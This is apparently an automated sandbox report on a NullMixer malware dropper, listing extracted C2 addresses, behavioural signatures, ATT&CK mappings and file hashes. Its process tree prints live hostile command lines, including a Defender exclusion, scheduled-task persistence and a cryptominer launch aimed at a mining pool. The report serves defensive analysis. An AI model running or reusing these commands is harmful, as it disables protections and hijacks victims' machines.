Analysis
-
max time kernel
150s -
max time network
157s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
07-01-2024 19:31
General
-
Target
640241afe83f23ed74de217149943294fb612ba8a283edb5049c23f059414a8aexe.exe
-
Size
4.7MB
-
MD5
64a534242627bc0dfc8bdb32f49a4d59
-
SHA1
8cec059ca3eb9b8a77775c021c155f00c9d18395
-
SHA256
640241afe83f23ed74de217149943294fb612ba8a283edb5049c23f059414a8a
-
SHA512
b8a677769ade9740f63cb163b69bcaed61583185f9a62fb2e672123b8445c90fafbc2036bbb64f6f301390210d06dda607b12b783ba1155666043d3534405152
-
SSDEEP
98304:yXmTuJH5FPywbQ/zpgXGfVfhYB726W9B/VIPGbgKVZ1G:yXmqRPYppdfZfVIPEG
Malware Config
Extracted
nullmixer
http://hsiens.xyz/
Extracted
privateloader
http://37.0.10.214/proxies.txt
http://37.0.10.244/server.txt
http://wfsdragon.ru/api/setStats.php
37.0.10.237
Extracted
vidar
40.1
706
https://eduarroma.tumblr.com/
-
profile_id
706
Extracted
smokeloader
2020
http://varmisende.com/upload/
http://fernandomayol.com/upload/
http://nextlytm.com/upload/
http://people4jan.com/upload/
http://asfaltwerk.com/upload/
Extracted
gcleaner
194.145.227.161
Signatures
-
BetaBot
Beta Bot is a Trojan that infects computers and disables Antivirus.
-
Detect Fabookie payload 1 IoCs
-
Fabookie
Fabookie is facebook account info stealer.
-
GCleaner
GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.
-
Modifies firewall policy service 2 TTPs 8 IoCs
-
Modifies security service 2 TTPs 1 IoCs
-
NullMixer
NullMixer is a malware dropper leading to an infection chain of a wide variety of malware families.
-
OnlyLogger
A tiny loader that uses IPLogger to get its payload.
-
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
-
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Vidar
Vidar is an infostealer based on Arkei stealer.
-
OnlyLogger payload 2 IoCs
-
Vidar Stealer 4 IoCs
-
Disables taskbar notifications via registry modification
-
Disables use of System Restore points 1 TTPs
-
Looks for VMWare services registry key. 1 TTPs 3 IoCs
-
Sets file execution options in registry 2 TTPs 20 IoCs
-
Sets service image path in registry 2 TTPs 1 IoCs
-
ASPack v2.12-2.42 3 IoCs
Detects executables packed with ASPack v2.12-2.42
-
Checks BIOS information in registry 2 TTPs 1 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Executes dropped EXE 31 IoCs
-
Loads dropped DLL 64 IoCs
-
Adds Run key to start application 2 TTPs 3 IoCs
-
Checks for any installed AV software in registry 1 TTPs 2 IoCs
-
Checks whether UAC is enabled 1 TTPs 6 IoCs
-
Drops desktop.ini file(s) 1 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Maps connected drives based on registry 3 TTPs 6 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 24 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 10 IoCs
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
-
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
-
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Enumerates system info in registry 2 TTPs 2 IoCs
-
Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs
-
Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs
-
Modifies Internet Explorer settings 1 TTPs 1 IoCs
-
Modifies system certificate store 2 TTPs 5 IoCs
-
NTFS ADS 4 IoCs
-
Runs regedit.exe 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious behavior: MapViewOfSection 48 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\640241afe83f23ed74de217149943294fb612ba8a283edb5049c23f059414a8aexe.exe"C:\Users\Admin\AppData\Local\Temp\640241afe83f23ed74de217149943294fb612ba8a283edb5049c23f059414a8aexe.exe"2⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\setup_install.exe"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun041024b30f4a0.exe5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun041024b30f4a0.exeSun041024b30f4a0.exe6⤵
- Executes dropped EXE
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun043bec3ec581a9.exe5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun043bec3ec581a9.exeSun043bec3ec581a9.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies system certificate store
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1948 -s 9607⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun047089ae5093c14.exe5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun047089ae5093c14.exeSun047089ae5093c14.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun045118d0261f811cc.exe5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun045118d0261f811cc.exeSun045118d0261f811cc.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1952 -s 6087⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2760 -s 6248⤵
- Program crash
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun043e60205beb4f.exe5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun043e60205beb4f.exeSun043e60205beb4f.exe6⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun04637c853e.exe5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun04637c853e.exeSun04637c853e.exe6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-63UMJ.tmp\Sun04637c853e.tmp"C:\Users\Admin\AppData\Local\Temp\is-63UMJ.tmp\Sun04637c853e.tmp" /SL5="$201F6,506086,422400,C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun04637c853e.exe"7⤵
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun0473a3260232e1c.exe5⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun0473a3260232e1c.exeSun0473a3260232e1c.exe6⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun04f8c94eea9cb9.exe5⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun04dac6d7a0.exe5⤵
- Loads dropped DLL
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2596 -s 4365⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2192 -s 6326⤵
- Program crash
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2416 -s 3444⤵
- Program crash
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\2A7A.exeC:\Users\Admin\AppData\Local\Temp\2A7A.exe2⤵
- Sets file execution options in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe3⤵
- Modifies firewall policy service
- Sets file execution options in registry
- Checks BIOS information in registry
- Adds Run key to start application
- Drops desktop.ini file(s)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Enumerates system info in registry
- Modifies Internet Explorer Protected Mode
- Modifies Internet Explorer Protected Mode Banner
- Modifies Internet Explorer settings
- NTFS ADS
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\qoseikss1cw7_1.exe/suac4⤵
- Modifies firewall policy service
- Sets file execution options in registry
- Executes dropped EXE
- Checks for any installed AV software in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks processor information in registry
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\regedit.exe"C:\Windows\SysWOW64\regedit.exe"5⤵
- Modifies security service
- Sets file execution options in registry
- Sets service image path in registry
- Runs regedit.exe
-
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x1BB70478" /TR "C:\PROGRA~3\JAVAUP~1\QOSEIK~1.EXE" /RL HIGHEST5⤵
- Creates scheduled task(s)
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\52A3.exeC:\Users\Admin\AppData\Local\Temp\52A3.exe2⤵
- Executes dropped EXE
-
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "2004686144-118907148718194177782097248288-1463520282-2146487222-9021175951750258551"1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun04dac6d7a0.exeSun04dac6d7a0.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\chrome3.exe"C:\Users\Admin\AppData\Local\Temp\chrome3.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
-
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1260 -s 9722⤵
- Loads dropped DLL
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2200 -s 6243⤵
- Program crash
-
-
-
C:\Users\Admin\AppData\Local\Temp\7zS079D1C86\Sun04f8c94eea9cb9.exeSun04f8c94eea9cb9.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome 5.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit3⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'4⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\services64.exe"C:\Users\Admin\AppData\Roaming\services64.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit4⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'5⤵
- Creates scheduled task(s)
-
-
-
C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"4⤵
- Executes dropped EXE
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.add/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6O4DG/ZgkwoY7/pmBv4ks3wJ7PR9JPsLklOJLkitFc6Y" --cinit-idle-wait=5 --cinit-idle-cpu=70 --tls --cinit-stealth4⤵
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\PBrowFile594.exe"C:\Users\Admin\AppData\Local\Temp\PBrowFile594.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\2.exe"C:\Users\Admin\AppData\Local\Temp\2.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks whether UAC is enabled
-
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\is-EVKHH.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-EVKHH.tmp\setup_2.tmp" /SL5="$201BC,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\setup_2.exe"C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\is-CHPP3.tmp\setup_2.tmp"C:\Users\Admin\AppData\Local\Temp\is-CHPP3.tmp\setup_2.tmp" /SL5="$A01BE,140785,56832,C:\Users\Admin\AppData\Local\Temp\setup_2.exe" /SILENT5⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: GetForegroundWindowSpam
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe"2⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\3002.exe"C:\Users\Admin\AppData\Local\Temp\3002.exe" -a3⤵
- Looks for VMWare services registry key.
- Executes dropped EXE
- Checks whether UAC is enabled
- Maps connected drives based on registry
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
-
-
C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"C:\Users\Admin\AppData\Local\Temp\jhuuee.exe"2⤵
- Executes dropped EXE
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2504 -s 11002⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2300 -s 6243⤵
- Program crash
-
-
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-1123323611-629947275-14237999904116058941331388040-1389623353-233765702415995664"1⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -Embedding1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "-680568721-317033627633521073891971017-945935072577254687-217881965489963448"1⤵
-
C:\Windows\system32\conhost.exe\??\C:\Windows\system32\conhost.exe "8144506311850775561452332201-534588204-15969450552028284873106572381-634524299"1⤵
Network
MITRE ATT&CK Enterprise v15
Persistence
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
3Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Privilege Escalation
Boot or Logon Autostart Execution
3Registry Run Keys / Startup Folder
3Create or Modify System Process
2Windows Service
2Scheduled Task/Job
1Defense Evasion
Modify Registry
9Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
360KB
MD50c819dd27a128d9234daa3d772fb8c20
SHA1d5d36492818872da8e70dc28cc85389b8e0f3819
SHA256ae088798b181a2bf822fcd3bec3a11779f45a8e3b83cb6c75c5ffbffc3c3d5b2
SHA512f502ddb79703297cf0592e68c3f1f964584725d7aa670272998f174ffa108bb7340c0d65d38d69e1b3f7f1217628dadda108fa2d5fe1eab73b7b3302b9f769b7
-
Filesize
56KB
MD5e511bb4cf31a2307b6f3445a869bcf31
SHA176f5c6e8df733ac13d205d426831ed7672a05349
SHA25656002017746f61eee8d8e9b5ad2f3cbb119dc99300c5b6d32c1be184d3e25137
SHA5129c81de34bf3b0eb75405c726d641ef6090054e9be8e0c0ab1bb2ed095e6477ce2fa8996868bf8a77a720b210a76b5f4e1b3b086d7f40449d79498681b367199c
-
Filesize
1.3MB
MD5e113dae909b8fe86578d8558326d626b
SHA128d21842fce5df5dee1704eb4c28388c44860a53
SHA2566e42b651324f4b813fc623bfd8ad7862ae425123d1b84f9c9dd6da6b45bc9f11
SHA512d52e53d1c9d3f69d9651843c311c24de9d9b49e7ed7324bc42ce39a13c41ade20d95f1e3e519ce4e3a87cc3310340e582d76de788d6e39e4976e98dd4d3c3bd4
-
Filesize
505KB
MD57819b4b201cf40ca593d57d097da6ad4
SHA1c9ac0551dabe37ab5b45e41a4269264d5290aa5d
SHA256c68e1d85b2148cb8d8c87af42a364b5ff4d8bb87704a901921570efc880d0789
SHA512f0302bcb4ffe46ad447e246f5c666d2b70b28302f2b7d8053891437f1b540bc708219f5ec1db60432f143ecc08d26794aa66e3a87334e5be3b01a58c0de5dd76
-
Filesize
757KB
MD58887a710e57cf4b3fe841116e9a0dfdd
SHA18c1f068d5dda6b53db1c0ba23fd300ac2f2197c4
SHA256e045b4a1c9f6640814f6e39903e1f03f2c7f1e3b3d1c6dbf07a409732655eff4
SHA5121507f3d3a32c8c0d1ae2ee2a6f02f86f7de5f956ef066c7284ff4f847a5fe8322984043ee95b576eb4d40b2f08508e49059a581443605978ec4cba03da1273a6
-
Filesize
139KB
MD521c2e29752775312d9abd41a4c96c79d
SHA1661c9880a62f799ecedc44482919b52073aa86ec
SHA2560c8bdc0a9db56e786392211abc98392c9f3c0fc916815d351a1f722056753bad
SHA5124dd2cb30414323ad75a1b8d140b9fffc009f887f40a2b3f1e56efd7dc34e43ce8e34d61ebf8f620f811cf2086c816f0a0a65fa460614803fa6bf1d7530bcc41b
-
Filesize
152KB
MD5e9607f4023c8d12653a55373ded4250b
SHA1afebad89cc738766e2e9d19c64df1818ef84a49c
SHA256974754ed05dc489b5db9de968c4316766675fdc35911b31c9238b7efd7c8c0aa
SHA512c2b239978402ba2268839ecbb92b53e800e842288c03dccd72ea709e3cb8a9e291a962eb71bd770d973099b40a472cf6101a11af15e7e0289ed8cdbfd5e5e8fa
-
Filesize
1.2MB
MD5f79878c5bb37eaf44b6632dfdf5207a0
SHA1175d67306e3c8795da5d7a6bed638ed071dd3cbb
SHA2565bc06297cbc3f94d9794721ef91fa737da870c7a822efd5e603516153074fbb3
SHA512a98e69b463a6a8cfd71cd1767c037ae337feab8aec30b615b8f35adc4347d32230147097fa3204600c1d66d3b2f8e99f9716fc263bb7af048153828d048bf919
-
Filesize
1.0MB
MD52949f508ff5e507bff7801a9f81dac62
SHA17629d2ca3be460943514b1209ee789d96d915c52
SHA2562794d8e923e83300f932da44a06062fd8f3b3f45717bc1b1921bb16d23a2277a
SHA512422f5b80c3a2a63e5adfacd732ec89baf31da5d272fa98c29a553b93e48918ed26de0c027906ccf612d3585c9f82f904ba38e385a9ee53dbda18d485908524d7
-
Filesize
54KB
MD5e6e578373c2e416289a8da55f1dc5e8e
SHA1b601a229b66ec3d19c2369b36216c6f6eb1c063e
SHA25643e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f
SHA5129df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89
-
Filesize
65KB
MD5ac05d27423a85adc1622c714f2cb6184
SHA1b0fe2b1abddb97837ea0195be70ab2ff14d43198
SHA256c6456e12e5e53287a547af4103e0397cb9697e466cf75844312dc296d43d144d
SHA5126d0ef9050e41fbae680e0e59dd0f90b6ac7fea5579ef5708b69d5da33a0ece7e8b16574b58b17b64a34cc34a4ffc22b4a62c1ece61f36c4a11a0665e0536b90d
-
Filesize
171KB
MD59c0c641c06238516f27941aa1166d427
SHA164cd549fb8cf014fcd9312aa7a5b023847b6c977
SHA2564276af3669a141a59388bc56a87f6614d9a9bdddf560636c264219a7eb11256f
SHA512936ed0c0b0a7ff8e606b1cc4175a1f9b3699748ccbba1c3aff96203033d2e9edabf090e5148370df42fbfc4e31d7229493706ff24f19ff42ff7bef74a6baad06
-
Filesize
691KB
MD59303156631ee2436db23827e27337be4
SHA1018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA5129fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f
-
Filesize
22KB
MD592dc6ef532fbb4a5c3201469a5b5eb63
SHA13e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA2569884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA5129908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3
-
Filesize
216KB
MD5b37377d34c8262a90ff95a9a92b65ed8
SHA1faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA51269d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc
-
Filesize
212KB
MD51bfb5deb08ebf336bc1b3af9a4c907cc
SHA1258f2de1ed1f65e65b181d7cb1f308c0bb1078de
SHA256477b4e6c8eec49e7777796751d1fdfd4a6efe47be63a544a0aa9d5f871d7b3f7
SHA5125f5e5a32c911642c4be0d4eb00b02b47c62b2c621ece214447f0b78d0c15bc96c2489ef78685c5f0dd9f4167c614334eefd78c0bdbbd3cb3f7f6143933594f16
-
Filesize
43KB
MD593460c75de91c3601b4a47d2b99d8f94
SHA1f2e959a3291ef579ae254953e62d098fe4557572
SHA2560fdba84fe8ed2cf97023c544d3f0807dbb12840c8e7d445a3a4f55174d78b5b2
SHA5124370ae1a1fc10c91593839c51d0fbae5c0838692f95e03cac315882b026e70817b238f7fe7d9897049856469b038acc8ccfd73aae1af5775bfef35bde2bf7856
-
Filesize
1004KB
MD520f8196b6f36e4551d1254d3f8bcd829
SHA18932669b409dbd2abe2039d0c1a07f71d3e61ecd
SHA2561af55649a731abb95d71e2e49693a7bcf87270eb4f8712b747f7e04a0a2a3031
SHA51275e533ca9fba59e522c3307c78052ab367a507c9bc9b3d5bdb25dfb9a0a67941920ec832f592de319e929512ae2c84df4ca9a73f785030aa8c9c98cce735bccb
-
Filesize
100KB
MD56a74bd82aebb649898a4286409371cc2
SHA1be1ba3f918438d643da499c25bfb5bdeb77dd2e2
SHA256f0a03868c41f48c86446225487eda0e92fb26319174209c55bd0a941537d3f5a
SHA51262a36e3c685f02e7344ca9c651ae12a2ebedd4ff55cf6206f03fbdca84fc555b95bcb6fcf1889d273676ddd33f85c5bcbe3862a56151149c36d32ef868b00707
-
Filesize
218KB
MD5d09be1f47fd6b827c81a4812b4f7296f
SHA1028ae3596c0790e6d7f9f2f3c8e9591527d267f7
SHA2560de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e
SHA512857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595
-
Filesize
113KB
MD59aec524b616618b0d3d00b27b6f51da1
SHA164264300801a353db324d11738ffed876550e1d3
SHA25659a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e
SHA5120648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0
-
Filesize
647KB
MD55e279950775baae5fea04d2cc4526bcc
SHA18aef1e10031c3629512c43dd8b0b5d9060878453
SHA25697de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87
SHA512666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02
-
Filesize
69KB
MD51e0d62c34ff2e649ebc5c372065732ee
SHA1fcfaa36ba456159b26140a43e80fbd7e9d9af2de
SHA256509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723
